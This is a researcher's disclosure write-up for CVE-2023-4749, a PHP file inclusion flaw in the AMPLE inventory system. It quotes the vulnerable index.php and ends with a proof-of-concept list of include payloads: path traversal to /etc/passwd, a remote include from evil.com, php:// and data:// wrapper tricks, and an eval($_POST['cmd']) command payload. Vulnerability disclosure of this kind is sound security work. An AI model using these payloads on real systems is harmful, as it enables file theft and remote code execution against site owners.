【CVE-2023-4749】Open Source AMPLE Inventory Management System has a File Inclusion Vulnerability

CVE 1 Minutes

Update

Update 2023/09/04

The vulnerability has been included and approved for public disclosure by MITRE.

CVE Record:CVE-2023-4749

NVD-CVE-2023-4749

Update 2023/09/03

On September 3rd, I submitted the vulnerability to the VulDB and was assigned a CVE number.

Vuln_Author: WEI(ギカク)

AMPLE

AMPLE is an open source inventory management system , written in php , for inventory management and monitoring of goods.

The following powerful features are included:

  • Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.
  • Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.
  • Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.
  • Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.

File Inclusion Vulnerability

The file inclusion vulnerability exists in the index.php file with the following source code

<?php require_once 'inc/header.php'; ?>
<?php require_once 'inc/sidebar.php'; ?>

  <!-- Content Wrapper. Contains page content -->

  <?php 
        if (isset($_GET['page'])) {
          $page ='pages/' .$_GET['page'].'.php';

        }else{
          $page = 'pages/dashboard.php';
        }
        if (file_exists($page)) {
          require_once $page; 
        }else{
          require_once 'pages/error_page.php';
        }
 ?>
  <!-- Control Sidebar -->
  <aside class="control-sidebar control-sidebar-dark">
    <!-- Control sidebar content goes here -->
  </aside>
  <!-- /.control-sidebar -->

 <?php require_once 'inc/footer.php'; ?>

This code has a file inclusion vulnerability.

CWE-98

Unsanitized input from an HTTP parameter flows into require_once, where it is included dynamically. Allowing unvalidated user input to control files that are included dynamically in PHP can lead to malicious code execution.

PoC

Since it is a common file inclusion vulnerability, it can be very simple to construct a piece of malicious code to trigger the vulnerability.

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?filename=http://evil.com/malicious.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
?c=data://text/plain,<?php echo "Gikaku";?>
?c=data://text/plain,<?php eval($_POST['cmd']);?>

公開済み